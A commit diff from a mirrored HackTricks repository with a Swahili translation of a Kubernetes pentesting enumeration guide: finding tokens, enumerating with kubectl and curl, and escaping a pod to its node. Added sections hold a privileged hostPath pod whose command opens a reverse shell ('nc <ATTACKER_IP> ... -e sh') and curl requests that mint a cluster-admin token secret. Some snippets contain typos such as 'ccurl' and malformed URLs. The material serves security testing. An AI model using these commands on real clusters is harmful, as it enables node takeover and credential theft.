gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-10 12:13:17 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/kubernetes-security/kubernetes-enumera

Browse Source
This commit is contained in:
Translator
2025-01-22 09:51:26 +00:00
parent 2c0cae0424
commit 59335c9c21
2 changed files with 238 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files

252
src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
View File

@@ -6,7 +6,7 @@
Ikiwa umepata ufikiaji wa mashine, mtumiaji anaweza kuwa na ufikiaji wa jukwaa la Kubernetes. Token kawaida hupatikana katika faili inayotajwa na **env var `KUBECONFIG`** au **ndani ya `~/.kube`**.
Katika folda hii unaweza kupata faili za usanidi zenye **tokens na usanidi wa kuungana na API server**. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.
Katika folda hii unaweza kupata faili za usanidi zenye **tokens na usanidi wa kuungana na seva ya API**. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.
Ikiwa umepata pod ndani ya mazingira ya kubernetes, kuna maeneo mengine ambapo unaweza kupata tokens na taarifa kuhusu mazingira ya K8 ya sasa:
@@ -33,7 +33,7 @@ zina faili:
- **namespace**: Inaonyesha namespace ya sasa
- **token**: Inabeba **service token** ya pod ya sasa.
Sasa kwamba una token, unaweza kupata API server ndani ya variable ya mazingira **`KUBECONFIG`**. Kwa maelezo zaidi endesha `(env | set) | grep -i "kuber|kube`**`"`**
Sasa kwamba una token, unaweza kupata seva ya API ndani ya variable ya mazingira **`KUBECONFIG`**. Kwa maelezo zaidi endesha `(env | set) | grep -i "kuber|kube`**`"`**
Token ya akaunti ya huduma inasainiwa na funguo iliyoko katika faili **sa.key** na kuthibitishwa na **sa.pub**.
@@ -55,7 +55,7 @@ Ikiwa hujui ni nini **RBAC**, **soma sehemu hii**.
## GUI Applications
- **k9s**: GUI inayoorodhesha klasta ya kubernetes kutoka kwenye terminal. Angalia amri katika [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Andika `:namespace` na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
- **k9s**: GUI inayoorodhesha klasta ya kubernetes kutoka terminal. Angalia amri katika [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Andika `:namespace` na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
- **k8slens**: Inatoa siku chache za majaribio bure: [https://k8slens.dev/](https://k8slens.dev/)
## Enumeration CheatSheet
@@ -63,12 +63,12 @@ Ikiwa hujui ni nini **RBAC**, **soma sehemu hii**.
Ili kuorodhesha mazingira ya K8s unahitaji kadhaa ya haya:
- **token halali ya uthibitishaji**. Katika sehemu iliyopita tuliona wapi pa kutafuta token ya mtumiaji na token ya akaunti ya huduma.
- **anwani (**_**https://host:port**_**) ya API ya Kubernetes**. Hii inaweza kupatikana kawaida katika variable za mazingira na/au katika faili ya kube config.
- **Hiari**: **ca.crt ili kuthibitisha API server**. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha API server, lakini ukitumia `--insecure-skip-tls-verify` na `kubectl` au `-k` na `curl` hutahitaji hii.
- **anwani (**_**https://host:port**_**) ya API ya Kubernetes**. Hii inaweza kupatikana kawaida katika variables za mazingira na/au katika faili ya kube config.
- **Hiari**: **ca.crt ili kuthibitisha seva ya API**. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha seva ya API, lakini ukitumia `--insecure-skip-tls-verify` na `kubectl` au `-k` na `curl` hutahitaji hii.
Kwa maelezo hayo unaweza **kuorodhesha kubernetes**. Ikiwa **API** kwa sababu fulani inapatikana kupitia **Mtandao**, unaweza tu kupakua taarifa hiyo na kuorodhesha jukwaa kutoka kwa mwenyeji wako.
Hata hivyo, kawaida **API server iko ndani ya mtandao wa ndani**, kwa hivyo utahitaji **kuunda tunnel** kupitia mashine iliyovunjwa ili kuweza kuifikia kutoka kwa mashine yako, au unaweza **kupakia** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, au tumia **`curl/wget/chochote`** kufanya maombi ya HTTP ya moja kwa moja kwa API server.
Hata hivyo, kawaida **seva ya API iko ndani ya mtandao wa ndani**, kwa hivyo utahitaji **kuunda tunnel** kupitia mashine iliyovunjika ili kuweza kuifikia kutoka kwa mashine yako, au unaweza **kupakia** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, au tumia **`curl/wget/chochote`** kufanya maombi ya HTTP ya moja kwa moja kwa seva ya API.
### Differences between `list` and `get` verbs
@@ -98,7 +98,7 @@ Wanafungua muunganisho wa mtiririko ambao unakurudishia orodha kamili ya Deploym
### Kutumia curl
Kutoka ndani ya pod unaweza kutumia vigezo kadhaa vya env:
Kutoka ndani ya pod unaweza kutumia vigezo kadhaa vya mazingira:
```bash
export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
@@ -113,7 +113,7 @@ alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
### Kutumia kubectl
Kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:
Ili kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:
Kwa kawaida, APISERVER inawasiliana na muundo wa `https://`
```bash
@@ -121,7 +121,7 @@ alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-
```
> ikiwa hakuna `https://` katika url, unaweza kupata Kosa Kama Ombi Mbaya.
Unaweza kupata [**cheatsheet rasmi ya kubectl hapa**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio tofauti chaguzi za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji nayo.
Unaweza kupata [**karatasi ya udanganyifu rasmi ya kubectl hapa**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio tofauti chaguzi za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji nayo.
Ili kupata ombi la HTTP ambalo `kubectl` inatuma unaweza kutumia parameter `-v=8`
@@ -150,7 +150,7 @@ kubectl config set-context --current --namespace=<namespace>
{{#endtab }}
{{#endtabs }}
Ikiwa umeweza kuiba baadhi ya akreditivu za watumiaji unaweza **kuziunda kwa ndani** ukitumia kitu kama:
Ikiwa umeweza kuiba akauti za watumiaji, unaweza **kuziunda kwa ndani** ukitumia kitu kama:
```bash
kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
@@ -231,7 +231,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
### Pata majina ya maeneo
Kubernetes inasaidia **vikundi vingi vya virtual** vinavyoungwa mkono na kundi moja la kimwili. Vikundi hivi vya virtual vinaitwa **majina ya maeneo**.
Kubernetes inasaidia **vikundi vingi vya virtual** vinavyoungwa mkono na klasta moja ya kimwili. Vikundi hivi vya virtual vinaitwa **majina ya maeneo**.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -272,7 +272,7 @@ for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f
```
### Pata Akaunti za Huduma
Kama ilivyojadiliwa mwanzoni mwa ukurasa huu **wakati pod inatekelezwa, akaunti ya huduma kawaida inatolewa kwake**. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kupandisha mamlaka.
Kama ilivyojadiliwa mwanzoni mwa ukurasa huu **wakati pod inatekelezwa, akaunti ya huduma kwa kawaida inatolewa kwake**. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kuongeza mamlaka.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -309,7 +309,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
### Pata Pods
Pods ndizo **containers** halisi ambazo zitakuwa **zinaendesha**.
Pods ni **containers** halisi ambazo zitafanya **kazi**.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -328,7 +328,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
### Pata Huduma
Kubernetes **huduma** zinatumika ku **onyesha huduma katika bandari na IP maalum** (ambayo itafanya kazi kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.
Kubernetes **huduma** zinatumika ili **kuweka huduma wazi katika bandari na IP maalum** (ambayo itakuwa kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -383,7 +383,7 @@ kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
### Pata cronjob
Cron jobs inaruhusu kupanga kutumia sintaksia kama ya crontab uzinduzi wa pod ambayo itafanya kitendo chochote.
Cron jobs inaruhusu kupanga kutumia sintaksia kama crontab uzinduzi wa pod ambayo itatekeleza kitendo chochote.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -401,7 +401,7 @@ kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
### Pata configMap
configMap daima ina habari nyingi na configfile ambazo zinatolewa kwa programu zinazotembea katika kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/nje.
configMap kila wakati ina habari nyingi na configfile ambazo zinatoa kwa programu zinazotembea katika kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/nje.
{{#tabs }}
{{#tab name="kubectl" }}
@@ -459,9 +459,13 @@ k top pod --all-namespaces
{{#endtab }}
{{#endtabs }}
## Kuingiliana na klasta bila kutumia kubectl
Kwa kuwa jukwaa la kudhibiti la Kubernetes linaonyesha API ya REST-ful, unaweza kuunda maombi ya HTTP kwa mikono na kuyatumia na zana nyingine, kama **curl** au **wget**.
### Kutoroka kutoka kwa pod
Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, badilisha kwenda kwenye pod iliyoundwa kisha chroot kwenye mfumo wa node. Unaweza kutumia pods zilizopo kama rejeleo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.
Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, kubadilisha kwenda kwenye pod iliyoundwa na kisha chroot kwenye mfumo wa node. Unaweza kutumia pods zilizopo kama rejeleo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.
```bash
kubectl get pod <name> [-n <namespace>] -o yaml
```
@@ -501,7 +505,7 @@ restartPolicy: Never
# or using
# node-role.kubernetes.io/master: ""
```
Baada ya hapo unaunda pod.
Baada ya hapo unaunda podi
```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```
@@ -509,13 +513,219 @@ Sasa unaweza kubadilisha kwenda kwenye pod iliyoundwa kama ifuatavyo
```bash
kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
```
Na hatimaye unachora chroot ndani ya mfumo wa node.
Na hatimaye unachroot ndani ya mfumo wa node.
```bash
chroot /root /bin/bash
```
Taarifa zilizopatikana kutoka: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## Marejeo
### Kuunda pod yenye mamlaka
Faili la yaml linalolingana ni kama ifuatavyo:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: everything-allowed-exec-pod
labels:
app: pentest
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: everything-allowed-pod
image: alpine
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "nc <ATTACKER_IP> <ATTACKER_PORT> -e sh" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
volumes:
- name: noderoot
hostPath:
path: /
```
Unda pod kwa kutumia curl:
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 478' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"labels\":{\"app\":\"pentest\"},\"name\":\"everything-allowed-exec-pod\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"nc <ATTACKER_IP> <ATTACKER_PORT> -e sh\"],\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"image\":\"alpine\",\"name\":\"everything-allowed-pod\",\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"hostIPC\":true,\"hostNetwork\":true,\"hostPID\":true,\"volumes\":[{\"hostPath\":{\"path\":\"/\"},\"name\":\"noderoot\"}]}}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa pod
Futa pod kwa kutumia curl:
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
POD_NAME="everything-allowed-exec-pod"
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods/$POD_NAME"
```
### Unda Akaunti ya Huduma
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Length: 109' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"ServiceAccount\",\"metadata\":{\"name\":\"secrets-manager-sa-2\",\"namespace\":\"default\"}}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Akaunti ya Huduma
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
SA_NAME=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 35' -H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts/$SA_NAME"
```
### Unda Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'Accept: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 203' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"Role\",\"metadata\":{\"name\":\"secrets-manager-role\",\"namespace\":\"default\"},\"rules\":[{\"apiGroups\":[\"\"],\"resources\":[\"secrets\"],\"verbs\":[\"get\",\"create\"]}]}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles/$ROLE_NAME"
```
### Unda Kifungo cha Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 816' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"RoleBinding\",\"metadata\":{\"name\":\"secrets-manager-role-binding\",\"namespace\":\"default\"},\"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"Role\",\"name\":\"secrets-manager-role\"},\"subjects\":[{\"apiGroup\":\"\",\"kind\":\"ServiceAccount\",\"name\":\"secrets-manager-sa\",\"namespace\":\"default\"}]}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/$NAMESPACE/default/rolebindings?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Mkataba wa Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_BINDING_NAME=""
curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
```
### Futa Siri
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 219' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/$NAMESPACE/default/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Siri
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
SECRET_NAME=""
ccurl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'Accept: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
```
## Marejeleo
{{#ref}}
https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3